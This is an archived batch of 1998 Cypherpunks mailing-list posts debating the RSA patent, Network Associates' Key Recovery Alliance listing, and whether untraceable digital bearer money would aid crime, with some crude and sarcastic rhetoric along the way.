From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Sun, 15 Nov 1998 01:07:17 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Rivest Patent
In-Reply-To: <v04003a05b2727f7cc22e@[198.115.179.81]>
Message-ID: <199811141648.KAA27226@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Vin writes:

> On the other hand, it seems to me unreasonable, willfully ill-informed,
> and/or  malovelent to declare -- in the face of several judicial rulings
> which have firmly ratified the RSA PKC patent -- that  "prior art" exists
> which should have invalidated that patent.  Horseshit!

Judicial rulings notwithstanding, a description of that which is now known
as RSA Public Key Cryptography was published in a book of algorithms which
pre-dated by quite a few years its patenting and commercial promotion by
the current patent holders.  That exponentiation modulo the product of two
distinct odd primes was not easily reversable given knowlege of the
modulus and the exponent was hardly a closely guarded mathematical secret,
even decades before this fact was employed by cryptographers. 

All of this was extensively discussed here on Cypherpunks back when
disputes over the RSA patent were newsworthy, and I suggest you grep the
archives for more specifics. 

My point was that the US is one of the few countries to permit the
patenting of abstract mathematics, albeit it under the guise of some
practical "method and apparatus" jargon.  The fact that the patent
couldn't be successfully challenged even though its mathematical
underpinnings were well known years prior reflects badly only upon the
notion of mathematical patents, and hardly refutes the facts in evidence. 

> Stanford and Cylink couldn't find it, despite a highly motivated and
> well-funded search. They doubtless would have paid you handsomely for
> your evidence and definitive testimony, but you missed your chance. 

Again, (patent not invalidated) != (no prior art)

But then, I'm sure you knew that. 

> Now you'll -- collectively, Sirs? -- just have to settle for being
> another cadre in the crowd that hoots and sneers at Ron Rivest whenever
> he comes up with something new which significantly enhances our
> cryptographic arsenal (and has the gall to patent it or otherwise claim
> IP ownership.) 

One "foo on that" at the notion of patenting mathematics in general, and
of patenting ciphers employing data dependent rotates in particular,
hardly constitutes hooting and sneering directed at Ron Rivest, whose work
is greatly respected in the cryptographic community.

But then, I'm sure you knew that too. 

I'm also pleased to report that the DES Analytic Crack Project is plodding
along towards its goal of an algebraic inverse to DES. 

While the project will generate $10k in sponsorship money when fully
subscribed, we have started it off with a much smaller number of sponsors,
as quite a few potential sponsors have indicated an interest in seeing
some preliminary research results prior to remitting funds. 

Since we are not hurting for funds at the moment, we have decided to
devote 100% of our effort to the project at this time, and will probably
not have a further "pledge break" until 8-round DES bites the dust. Then
we will try to get the project fully subscribed, do the 16-round crack,
and write up the final report. 

-- 
Sponsor the DES Analytic Crack Project
http://www.cyberspace.org/~enoch/crakfaq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Todd Boyle" <tboyle@rosehill.net>
Date: Sun, 15 Nov 1998 03:49:00 +0800
To: "dbs" <dbs@philodox.com>
Subject: RE: DBS, Privacy, Money Laundering nonsense.
In-Reply-To: <v04020a0db2733d497ce9@[139.167.130.246]>
Message-ID: <000001be1005$2f0dff80$0100a8c0@P180.Workgroup>
MIME-Version: 1.0
Content-Type: text/plain



>Oops. Looks like you weren't watching your >'s :-). You're actually
>responding to Unicorn, not me. *He* was responding to something Todd Boyle
>said (well, probably trolled, given his past behavior :-)) on the DBS list.

I don't altogether enjoy living in the world I've created.  My
intent in posting my ideas is so that they'll either be verified,
or be neutralized or corrected by enzymes on your excellent list!  <G>

But I'm still stuck on these points:

 * Thieves exist in large numbers, throughout the world including my
     own immediate area.  Many more potential thieves in line, behind them.

 * If thieves could hide the money they stole, there would be substantial
    increase in frequency and severity of theft; mostly fraud, employee
    embezzlement, and white collar theft but also blatant scams and
    grift that is impractical today.  We're already seeing annual increases
    in embezzlement in the Seattle area from 10-50% over the last 10 years,
    getting similar to the rates around Los Angeles, for example.

 * Reducing trackability of money increases the severity and frequency
    of collusive crimes.  Large-scale political corruption, kickbacks
    and monopolies in the commercial sector, and a whole range of
    outright criminal blackmail become harder to prosecute.  With
    DBS you wouldn't be able to prove a damned thing.

 * The biggest single financial problem I have is mandatory levies
     (tax, utilities, monopolies) by the corrupt government. Your
     DBS will make this much worse by making it even easier to
     channel cash to politicians.

 * Fraud, embezzlement and corruption are in riotous equilibrium.  DBS
     reduces pressure on laundering, requiring other measures that hit
     my civil liberties somewhere else (physical IDs, cops, etc.)

 * Untraceable money *obviously* reduces tax collections.  What the IRS
     fails to collect from tax dodgers, eventually, I must pay more.

You seem to have a subconscious belief that DBS will shrink the government
sector.  This is a false assumption.  The government long ago achieved the
power to tax *as much as it wants*.  There is no natural immunity in our
culture or legal system.

The public sector has stabilized at 25% or 35% of the GNP, which is
apparently the maximum the animal can tolerate without falling over dead
(people striking, quitting work, and business moving overseas.)

Gimmicks like DBS will certainly not reduce the public sector in our
lifetimes. It will require an evolution in individual awareness and
behavior.

In mean time, managing the out-of-control government sector is your civic
duty, to your less intelligent wives, pensioners, and children and
neighbors. The preferred way to manage the governmt is the democratic
process, and public discourse and debate such as this list.

Breaking ranks and disobeying the law breeds further breakdown in
obedience of the whole legal framework.  There are lots of dumber and more
dangerous elements in the population.  The system is already *quite*
unfair to them.  When the superintelligent can steal through high-tech
money schemes, and the wealthy classes violate their own legal framework,
why shouldn't the thief just come and steal our cars, or fuck your daughter?
Frankly, we need laws, a lot more than we need DBS.

Now, what is your solution to prevent the use of DBS in large-scale
financial fraud, political payoffs, etc.?   Or is that outside your
scope, and such problems should be solved by wiretaps, surveillance or
what?

Don't tell me these problems are minor or will just disappear! Do you
know how much money is already wasted on audits and law enforcement in
this country?  Auditing is already hideously expensive, and the only
solid facts in the entire audit process are the goddamn bank statements.

You need a coherent argument on this problem.  You need measures within
the DBS technology itself, to address the need.  Opponents of DBS will
raise all these demagogic arguments.  You'll be hooted off the podium.

I fear you'll end up damaging the reputation of legitimate forms of
peer-to-peer electronic payments, which are badly needed in the economy.

Todd Boyle CPA   Kirkland WA   tboyle@rosehill.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: garp@chadmarc.com
Date: Sun, 15 Nov 1998 02:06:54 +0800
To: cypherpunks@toad.com
Subject: Welcome to the Risk Professionals Discussion Area!
Message-ID: <199811141736.MAA00113@ns.bccg.com>
MIME-Version: 1.0
Content-Type: text/plain



Thank you for participating in our conferencing system, John.

Please save this message.  It contains important information,
such as your login name and password (see below).

Our web conferencing offers online Help for all major features.
If you have questions about a feature, look for the help button
on the menubar.

Here is your login information.  Be sure to keep it somewhere safe!

Your Login Name: cypherpunks
Your Password: cypherpunks

You can change your password, email address, and other items
by selecting "Profiles" from the "More" button on the menubar.

Please be sure to come back and visit us at:
http://chat.bccg.com:8080/~GARP

We hope you enjoy participating in our conferences!

Sincerely,
garp@chadmarc.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 15 Nov 1998 02:27:13 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Will Price (NAI employee) on KRA
In-Reply-To: <199811141455.OAA30151@server.eternity.org>
Message-ID: <199811141757.MAA12938@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Forwarded:

To: ukcrypto@maillist.ox.ac.uk
Subject: Re: Escrow - news
Date: Sat, 14 Nov 1998 15:42:26 +0000
From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
:

Will Price writes:

> NAI being listed on the KRA page is *solely* a result of our TIS
> acquisition

On his most recent speaking tour of Europe, at which he promoted 
PGP v 6, Phil Zimmermann assured us categorically that NAI had at
his insistence withdrawn from the KRA.

It now appears that either (1) he lied to us (2) he was himself
lied to by NAI management or (3) NAI has rejoined.

> I really doubt anyone here actually called some KRA person and 
> officially renewed our membership.  Frankly, I doubt anyone
> here actually knows who to talk to there -- if there even is a
> "there".

You marketed version 6 of your product on the back of a claim that
you'd left the KRA. Yet NAI is now listed on the KRA website as a
member, and this is clearly doing your product material harm. Either
it's not true that you're a member, in which case your lawyers will be
able to extract so much money from KRA that it goes out of business,
whereupon the world will cheer and buy your product, or it is true, in
which case the damage will continue.

There is a deeper issue for the community here. For many years we have
tended to trust products because we know the technical people
involved. This has been the foundation for trust of other kinds. For
example, some years ago, a certain country's foreign ministry asked me
for a reference on Entrust prior to buying their products; my response
was that I knew both Paul van Oorschot and Mike Wiener, and in my
opinion they were both very competent. As a result of this, purchasing
decisions may have been taken with a significant effect on national
intelligence, economic competitiveness and even military preparedness.
As the country in question is a NATO member, its diplomatic comsec (or
lack of it) affects the UK directly.

Now, in one weekend, we have two cases where assurances from credible
technical people turned out to be unsatisfactory. Where does that
leave us?

Since I gave that reference for Entrust, the University here has
tightened up on liability. We must take care not to give references
that are untruthful or even misleading. We are urged to err on the
side of caution. So next time a foreign ministry asks me whether
Entrust products are kosher, I probably have to reply:


`You cannot prudently trust any third party to sell you trustworthy
comsec products. Recall Britain's selling old Enigmas to allies in the
Commonwealth; think of the fuss over red-threading; check out the
trapdoor in Sesame; and read up on key escrow. The only way you can
get good kit is if you build it yourself.  If you don't have the
skills, then I suggest you get some bright graduates to check out our
PhD programme - see <http://www.cl.cam.ac.uk/UoCCL/research/>'

A very traditional view of the world. Has nothing really changed since
the 1960's?

Ross

----------

Date: Sat, 14 Nov 1998 14:55:45 GMT
Message-Id: <199811141455.OAA30151@server.eternity.org>
From: Adam Back <aba@dcs.ex.ac.uk>
To: cypherpunks@cyberpass.net
Subject: Will Price (NAI employee) on KRA

This comment on NAI's KRA(P) membership by Will Price
<wprice@pgp.com>, a crypto type who works for PGP was forwarded to the
ukcrypto list by Ian Goodyer (uk-crypto list admin).  Not sure where
it was posted originally, or perhaps Will asked Ian to forwarded it.

Adam

------- Start of forwarded message -------
Date: Sat, 14 Nov 1998 11:43:07 +0000
To: ukcrypto@maillist.ox.ac.uk
From: "Ian D. Goodyer" <goodyer@well.ox.ac.uk>
Subject: Re: Escrow - news

Here is a response from Will Price who was formally from PGP inc and now of
course is with NAI.   ian

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I've commented about this on this list before I believe.  This appears
to be a case of really old news suddenly being dredged up for no
apparent wholesome reason -- which strikes me as quite odd because
Wired was apparently so eager to break this ancient story that they
didn't wait to ask anyone from NAI about it.

NAI being listed on the KRA page is *solely* a result of our TIS
acquisition.  I really doubt anyone here actually called some KRA
person and officially renewed our membership.  Frankly, I doubt anyone
here actually knows who to talk to there -- if there even is a
"there".  As I have said before, due to the TIS acquisition, NAI now
has a bunch of products which contain key escrow features. 
Eliminating or modifying these features such that they work in a less
big brother-like fashion will take significant time -- indeed entire
TIS products were based around managing key escrow infrastructures. 
Don't get me wrong, TIS had a lot of other great products, but it will
take time to redesign and rethink some of them in the context of
export and key escrow.  I'm not sure there's much point in withdrawing
from KRA when those products still exist.

These issues have no effect whatsoever on the PGP group.  As always,
we continue to publish full source code which effectively solves all
the export issues for us.


Robert Guerra wrote:
> I just picked this up from another mailing list that I am on.
Perhaps the
> folks at NAI can clarify things?
> 
> - ---------- Forwarded message ----------
> Date: Fri, 13 Nov 1998 10:55:06 +0000
> From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
> To: ukcrypto@maillist.ox.ac.uk
> Subject: Escrow - news
> 
> (1) Network Associates has quietly rejoined the Key Recovery
Alliance
> - - see http://www.kra.org.

- -- Will
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2

iQA/AwUBNkySo6y7FkvPc+xMEQIuygCfYosXGISVrKd4dYWwM8xOrVdd4WAAn3dT
XvDG6FMapZpjmvjucF67fwM5
=xa+R
-----END PGP SIGNATURE-----


Will Price, Architect/Sr. Mgr., PGP Client Products
Total Network Security Division
Network Associates, Inc.
Direct  (408)346-5906
Cell/VM (650)533-0399
<pgpfone://cast.cyphers.net>

PGPkey: <http://pgpkeys.mit.edu:11371/pks/lookup?op=getsearch=0xCF73EC4C>
------- End of forwarded message -------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 15 Nov 1998 02:20:42 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Will Price (NAI employee) on KRA
In-Reply-To: <199811141455.OAA30151@server.eternity.org>
Message-ID: <199811141804.NAA20445@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Date: Sat, 14 Nov 1998 09:57:53 -0800 (PST)
:
To: jya@pipeline.com
From: prz@pgp.com (Philip Zimmermann (via an auto-responder))
Subject: Got your message
:

Thanks for your message.  Sometimes it takes a day or two to get through 
all my email.  I will get back to you, or have someone from our company 
get back to you, as quickly as I can.   Thanks for your patience.  If you 
need to speak with someone immediately, please call our corporate offices 
at 408 988-3832 [called, got voicemail: closed until Monday.].  If you need 
to contact me by phone, see the contact information on my web page at 

http://www.pgp.com/phil.

In December 1997 my company, Pretty Good Privacy Inc, was acquired by 
McAfee Associates, which is now known as Network Associates [ref. kra.org].
If you haven't seen it already, you should take a look at the latest 
version of PGP, version 6, available in both commercial and freeware 
forms, for Windows and Mac, available for Web downloading from our 
company's web site at http://www.pgp.com.

The best site with the best all-around information about PGP, including
frequently asked questions, is http://www.pgpi.com, which is in Norway.  
They have information on where to get PGP if you live outside of the US or 
Canada, for commercial or freeware use.  They also provide pointers into 
our own domestic web site here to help you easily find where to get the 
latest versions of PGP in the US, for business or freeware.  They also 
tell you how to download the PGP source code for peer review, and where to 
get the Unix versions.  You can also download PGPfone from there.

-Philip Zimmermann





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Black Unicorn" <unicorn@schloss.li>
Date: Sun, 15 Nov 1998 05:11:46 +0800
To: <dbs@philodox.com>
Subject: RE: DBS, Privacy, Money Laundering nonsense.
In-Reply-To: <000001be1005$2f0dff80$0100a8c0@P180.Workgroup>
Message-ID: <001001be1010$5fda8470$1c86e5cf@svb.schloss.li>
MIME-Version: 1.0
Content-Type: text/plain



> >Oops. Looks like you weren't watching your >'s :-). You're actually
> >responding to Unicorn, not me. *He* was responding to something
> Todd Boyle
> >said (well, probably trolled, given his past behavior :-)) on
> the DBS list.
>
> I don't altogether enjoy living in the world I've created.  My
> intent in posting my ideas is so that they'll either be verified,
> or be neutralized or corrected by enzymes on your excellent list!  <G>
>
> But I'm still stuck on these points:

Ok let's work on them:

>  * Thieves exist in large numbers, throughout the world including my
>      own immediate area.  Many more potential thieves in line,
> behind them.
>
>  * If thieves could hide the money they stole, there would be substantial
>     increase in frequency and severity of theft; mostly fraud, employee
>     embezzlement, and white collar theft but also blatant scams and
>     grift that is impractical today.

You miss the point entirely.  Thieves CAN hide the money they stole today.
It's not even particularly hard.  See my previous post for an idea of how
hard it is to detect a thief hiding his money.

>We're already seeing annual
> increases
>     in embezzlement in the Seattle area from 10-50% over the last
> 10 years,
>     getting similar to the rates around Los Angeles, for example.

And so...?

Classic logical flaw.  After the fact, therefore because of the fact.

High tech is available now that wasn't before
The rate of embezzlement is higher
therefore high tech is to blame.

Clearly, therefore:

Merlyn waved his hands
the moon passed before the sun
therefore Merlyn caused the moon to pass before the sun.

I'll wager the percentage of embezzlement in your area has increased in
rough proportion to the growth of the local economy.  Check for me and get
back to us.

>  * Reducing trackability of money increases the severity and frequency
>     of collusive crimes.  Large-scale political corruption, kickbacks
>     and monopolies in the commercial sector, and a whole range of
>     outright criminal blackmail become harder to prosecute.  With
>     DBS you wouldn't be able to prove a damned thing.

You could hardly reduce the trackability of money anymore today.  A 500
million dollar fraud transferred through the world financial system hides in
about 20 trillion in funds which move every day.  That FinCEN actually can
detect crime via its network is a fantasy.  I've just been over the math
which demonstrates how difficult a task it really is.  Review it.  Crimes
are discovered and caught by good police work.  The fact that the
constitution makes "good police work" that much harder is a price to live
with in a free society.  Choose your poison.  Clearly technologies like
wiretaps and funds tracking are sold as investigatory tactics which result
in new cases being brought, but (at least in the case of money laundering)
this just isn't the case.  It's simply not supported by the numbers.  What
you don't hear today is how many cases get dropped because of lack of
evidence with plain ole banking today.  It's painfully easy to make money
vanish.

Given that a police state has the lowest incidence of crime you need to make
a fundamental decision about what kind of world you want to live in.  A
story for your consideration in the meantime:

The AIDS rate in Cuba is a fraction of the AIDS rate in the rest of the
world.  This despite the fact that prostitution is rampant, and Cuba is a
third (even fourth) world country.  Why is this so?  Because Castro ordered
all HIV+ citizens into HIV camps and isolated them from the rest of the
population immediately, like "civilized" countries used to do with Scarlet
and Yellow fever before people infected with a life threatening disease
became a minority group worthy of political protection.

So is it worth the price?

Perhaps you view the threat of DBS as so significant that it requires
dramatic, even draconian measures to prevent its adoption.  Unfortunately,
you have painted yourself into a corner because DBS and cash are identical
except with respect to medium of exchange.

>  * The biggest single financial problem I have is mandatory levies
>      (tax, utilities, monopolies) by the corrupt government. Your
>      DBS will make this much worse by making it even easier to
>      channel cash to politicians.

Then, by your argument, we should ban Cash as well.  What if I told you that
a new technology would allow armed robbers unprecedented mobility, the
ability to escape the scene of a crime in an instant, and provided them with
the ability to traverse long distances in making their escape while
protected from scrutiny.  What if this same technology gave them the means
to conceal from the view of any law enforcement the proceeds of their heist
and could make their path entirely untraceable to police?

Well, I suppose automobiles are going to have to go.

>  * Fraud, embezzlement and corruption are in riotous equilibrium.  DBS
>      reduces pressure on laundering, requiring other measures that hit
>      my civil liberties somewhere else (physical IDs, cops, etc.)

Again, there is no pressure on laundering today.  It's a trivial exercise.
Money laundering regulation has bred a cadre of professional launderers.
Even by the best numbers the authorities seize less than 0.006% of illicit
funds and spend 20000 times what they seize to seize it.

>  * Untraceable money *obviously* reduces tax collections.  What the IRS
>      fails to collect from tax dodgers, eventually, I must pay more.

Vote with your feet.  (I don't really agree with this assessment, but
regardless, if you believe it, reduce your tax burden by expatriating).
Again, taxes in countries with less financial regulation (almost all of the
non-U.S. countries) are typically less, if not substantially less than in
the U.S.  How do you explain this if your point is true?

> You seem to have a subconscious belief that DBS will shrink the government
> sector.  This is a false assumption.  The government long ago achieved the
> power to tax *as much as it wants*.  There is no natural immunity in our
> culture or legal system.

Again, then move.  I don't really care what DBS does to the government
sector.  I only care what it does to the costs of transactions.  I handle
the political and regulatory issues by moving.  (You might take John
Walker's example.  He bailed primarily to avoid the "bullshit factor" not
the tax).

> The public sector has stabilized at 25% or 35% of the GNP, which is
> apparently the maximum the animal can tolerate without falling over dead
> (people striking, quitting work, and business moving overseas.)

Uh, all those conditions are present today.

> Gimmicks like DBS will certainly not reduce the public sector in our
> lifetimes. It will require an evolution in individual awareness and
> behavior.

Again, see above.

> In mean time, managing the out-of-control government sector is your civic
> duty, to your less intelligent wives, pensioners, and children and
> neighbors. The preferred way to manage the governmt is the democratic
> process, and public discourse and debate such as this list.

Again, vote with your feet.  I'm too busy for civil disobedience, voting in
sham elections, and the two party system.  Grass roots political activism
changes nothing in my experience.  Even if it did, I still just don't have
the time.  I prefer supporting political processes that are forward looking
and interested in DBS.  These do exist.

> Breaking ranks and disobeying the law breeds further breakdown in
> obedience of the whole legal framework.

Which laws?  Those of the United States?  Well get cracking, the U.S. has
195 countries to invade, overthrow and pacify to harmonize foreign ideas
about how things should be done with the much more enlightened and effective
crime preventing methods prevailing in the United States today.  Stop
laughing, the integrity of the whole legal framework is at stake.

Actually, after some reflection I think that you're right.  Now if only we
could get all those blacks back in line we could get some real law and order
done.  How did we allow their civil disobedience to gain them anything?  Are
we going to _reward_ that kind of behavior?  It's a threat to the entire
system.  Now where did I put my sheets?

> There are lots of dumber and more
> dangerous elements in the population.  The system is already *quite*
> unfair to them.  When the superintelligent can steal through high-tech
> money schemes, and the wealthy classes violate their own legal framework,
> why shouldn't the thief just come and steal our cars, or fuck
> your daughter?

I see.  So DBS is going to be responsible for an increase in property and
violent crimes?  DBS will cause the poor to rise up because "Da Man" has
more power now?

Of course this is silliness of the highest degree.  The tendency to
overstate the power of DBS in here seems to be an affliction of both sides
now.  It's a technology, not a way of life.  Get over it.

> Frankly, we need laws, a lot more than we need DBS.

I won't even comment on the need for yet more regulation other than to say
that healthcare in e.g. Switzerland is a fraction of the cost of health care
in e.g. the United States because physicians don't have to carry $10 million
dollars in liability insurance.

> Now, what is your solution to prevent the use of DBS in large-scale
> financial fraud, political payoffs, etc.?   Or is that outside your
> scope, and such problems should be solved by wiretaps, surveillance or
> what?

What's your solution to prevent the use of cash and international wire
transfers in large-scale financial fraud, political payoffs, etc.?  Or is
that outside your scope?

> Don't tell me these problems are minor or will just disappear!

I'm telling you they already exist.  What are you going to do about it?
You're an accountant.  You should have answers for these things.

> Do you
> know how much money is already wasted on audits and law enforcement in
> this country?  Auditing is already hideously expensive, and the only
> solid facts in the entire audit process are the goddamn bank statements.

I think you might find that the cost of auditing is directly linked to the
likelihood of a civil suit against the auditors in the United States.
Address tort reform if you want to impact that.  You're a CPA, get cracking.

These aren't issues that are specific to DBS, they are endemic to the
current system

> You need a coherent argument on this problem.  You need measures within
> the DBS technology itself, to address the need.  Opponents of DBS will
> raise all these demagogic arguments.  You'll be hooted off the podium.

In the U.S. perhaps.  I'm not a resident there anymore so I could care less.
Any DBS system can be made to comply with country laws based on internet
address location or the front end dealer's compliance requirements.  The
underwriter in the system passes the responsibility for compliance to the
local issuer, which is as it should be.  What's the big deal?  You think a
global system has to comply with the highest level of regulation of any of
the participating actors...?  Of course that's nonsense.  The United States,
much as it might like to be, is not the final authority on world financial
regulation and is unlikely to be any time in the near future (thank god).

Opponents of DBS may raise all these arguments but they, and you, still have
not addressed the basic point that all these things are already possible
with cash.  Will they ban cash, and if so when and by what means?

> I fear you'll end up damaging the reputation of legitimate forms of
> peer-to-peer electronic payments, which are badly needed in the economy.

I'm unconcerned about "legitimate forms of peer-to-peer electronic payments"
because I am unaware of any.  Even mondex isn't truly peer to peer.

The silliness quotient of this discussion exceeded my tolerance level after
the "evils of civil disobedience" discussion.  (I also don't read
cypherpunks anymore so I won't see replies not copied to me personally).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 14 Nov 1998 23:18:46 +0800
To: cypherpunks@cyberpass.net
Subject: Will Price (NAI employee) on KRA
Message-ID: <199811141455.OAA30151@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




This comment on NAI's KRA(P) membership by Will Price
<wprice@pgp.com>, a crypto type who works for PGP was forwarded to the
ukcrypto list by Ian Goodyer (uk-crypto list admin).  Not sure where
it was posted originally, or perhaps Will asked Ian to forwarded it.

Adam

------- Start of forwarded message -------
Date: Sat, 14 Nov 1998 11:43:07 +0000
To: ukcrypto@maillist.ox.ac.uk
From: "Ian D. Goodyer" <goodyer@well.ox.ac.uk>
Subject: Re: Escrow - news

Here is a response from Will Price who was formally from PGP inc and now of
course is with NAI.   ian

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I've commented about this on this list before I believe.  This appears
to be a case of really old news suddenly being dredged up for no
apparent wholesome reason -- which strikes me as quite odd because
Wired was apparently so eager to break this ancient story that they
didn't wait to ask anyone from NAI about it.

NAI being listed on the KRA page is *solely* a result of our TIS
acquisition.  I really doubt anyone here actually called some KRA
person and officially renewed our membership.  Frankly, I doubt anyone
here actually knows who to talk to there -- if there even is a
"there".  As I have said before, due to the TIS acquisition, NAI now
has a bunch of products which contain key escrow features. 
Eliminating or modifying these features such that they work in a less
big brother-like fashion will take significant time -- indeed entire
TIS products were based around managing key escrow infrastructures. 
Don't get me wrong, TIS had a lot of other great products, but it will
take time to redesign and rethink some of them in the context of
export and key escrow.  I'm not sure there's much point in withdrawing
from KRA when those products still exist.

These issues have no effect whatsoever on the PGP group.  As always,
we continue to publish full source code which effectively solves all
the export issues for us.


Robert Guerra wrote:
> I just picked this up from another mailing list that I am on.
Perhaps the
> folks at NAI can clarify things?
> 
> - ---------- Forwarded message ----------
> Date: Fri, 13 Nov 1998 10:55:06 +0000
> From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
> Reply-To: ukcrypto@maillist.ox.ac.uk
> To: ukcrypto@maillist.ox.ac.uk
> Subject: Escrow - news
> 
> (1) Network Associates has quietly rejoined the Key Recovery
Alliance
> - - see http://www.kra.org.

- -- Will
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2

iQA/AwUBNkySo6y7FkvPc+xMEQIuygCfYosXGISVrKd4dYWwM8xOrVdd4WAAn3dT
XvDG6FMapZpjmvjucF67fwM5
=xa+R
-----END PGP SIGNATURE-----


Will Price, Architect/Sr. Mgr., PGP Client Products
Total Network Security Division
Network Associates, Inc.
Direct  (408)346-5906
Cell/VM (650)533-0399
<pgpfone://cast.cyphers.net>

PGPkey: <http://pgpkeys.mit.edu:11371/pks/lookup?op=get&search=0xCF73EC4C>
------- End of forwarded message -------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 15 Nov 1998 04:34:49 +0800
To: cypherpunks@cyberpass.net
Subject: Re: DBS, Privacy, Money Laundering nonsense.
Message-ID: <v04020a08b27393804830@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Sat, 14 Nov 1998 15:55:00 -0400
To: tboyle@rosehill.net
Cc: dbs@philodox.com
Subject: Re: DBS, Privacy, Money Laundering nonsense.
Mime-Version: 1.0
From: Ryan Lackey <ryan@venona.com>
Sender: <dbs@philodox.com>
Precedence: Bulk
List-Subscribe: <mailto:requests@philodox.com?subject=subscribe%20dbs>
X-Web-Archive: http://www.philodox.com/dbs-archive/

Also Sprach Todd Boyle (tboyle@rosehill.net):

>
>  * If thieves could hide the money they stole, there would be substantial
>     increase in frequency and severity of theft;

I think this is definitely true.  Particularly if it is *easy* to hide
the money stolen, as criminals may be expert in a particular field of
crime that is *not* financial -- it's already easy for a white-collar
criminal to hide money, using the same skills used in white-collar crimes
of other sorts, but not so easy for an armed robber.

>  * Reducing trackability of money increases the severity and frequency
>     of collusive crimes.

Reducing trackability and improving the velocity of money *does*
do this, but it's a side effect of the more important (and wider spread)
effect of useful forms of money: increasing the severity and frequency
of all kinds of collusion and cooperation!  This is what money is
for -- exchange.  That criminal exchange uses DBS is just saying that
criminal exchange is a form of exchange.
>
> In mean time, managing the out-of-control government sector is your civic
> duty, to your less intelligent wives,

Heh...I'd be afraid of saying this if I were married or ever planning to
be :)  On an archived list, no less... :)

>
> You need a coherent argument on this problem.  You need measures within
> the DBS technology itself, to address the need.  Opponents of DBS will
> raise all these demagogic arguments.  You'll be hooted off the podium.

This technology is layered (ooh, bad word to use in relation to money and
payment systems :).

I think you will agree with me that the
correct place for financial restraints (particularly voluntary ones,
for auditing purposes, which IMO are the most important -- it allows you
to say you are doing something, specify how it can be measured, and then
have it measured, rather than just having some vague after-the-fact threat
of enforcement if they catch you) on digital token money is not at
the following layers:

* Sub-atomic layer
* Atomic layer
* Hardware layer
* Network connection layer

and you seem to be making the case that it doesn't belong at the human/legal
layer.  However, there are two layers in the middle:

* application (core DBS protocols, etc.)
and
* presentation (graphical clients, etc.)

I believe the correct place for any voluntary restraints on DBS money is
not at the DBS protocol layer, but at a higher level.  This can be
built into the clients people choose to use for managing their money,
generate auditing reports, etc.  This provides people with the freedom
to use clients tailored to their legal requirements -- a corporation's
internal financial system should be far more complicated and constrained
than my personal wallet -- and makes it relatively easy for everything
to interoperate.

You can even design things at the levels higher than the DBS level to
escrow parts of coins with third parties, this requiring their participation
or approval for any transaction -- sort of a "registered DBS system".  If
you believe taxes are a worthwhile thing, a government could mandage the
use of such a system where the IRS was a party to each and every transaction.
This would work perfectly well technically, and would not compromise the
integrity of the protocols -- it's just a business decision on the part of
an issuer of electronic cash.  It's easy to see how this could work with
insurance schemes, split control of coins, etc.

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 15 Nov 1998 04:34:55 +0800
To: cypherpunks@cyberpass.net
Subject: Re: DBS, Privacy, Money Laundering nonsense.
Message-ID: <v04020a0ab27394196c16@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: "Michael Alexander" <mfa@alpha.univie.ac.at>
To: <dcsb@ai.mit.edu>
Subject: Re: DBS, Privacy, Money Laundering nonsense.
Date: Sat, 14 Nov 1998 20:52:53 +0100
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.0810.800
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: "Michael Alexander" <mfa@alpha.univie.ac.at>

>From: "Black Unicorn" <unicorn@schloss.li>
> That's on the order of $600
>trillion per year, just in SWIFT.  (Add another $1.3 billion for CHIPS and
>$989 million for Fedwire daily.  Oh, don't forget the foreign exchange

as a minor correction, SWIFT 's main service is to exchange payment
messages to feed into e.g. Fedwire or CHIPS so that would be double
counting

>The payment system today eats up over 1.5% of the GNP primarily because of
>nonsense regulations like CTR's and other transaction reporting
...
>1% of the GNP.  Instant 1% growth for changing a system of clearing.  Think
>about that for awhile.

slowly on that: payment systems costs represent what economists call
'specific taxes' that is they inflict deadweight losses on the economy. More
efficient payment instruments such as some being based on bearer
certificates would per se lower GDP but lead to higher demand in theory.
Its effect would be as instant as a cut in other broad ones such as income
or capital gains that is it involves lag.

On the actual percentage of payment systems costs as % of GDP my
estimates are way higher. By simply taking clearing float days of the major
retail, business and interbank instruments, the figure is more like >2%
with current (low) interest for the U.S. and even higher for Europe. This
does
not take into account that a more efficient payment system with a higher
money velocity would lower the demand for transaction money among other
effects.

Michael






For help on using this list (especially unsubscribing), send a message to
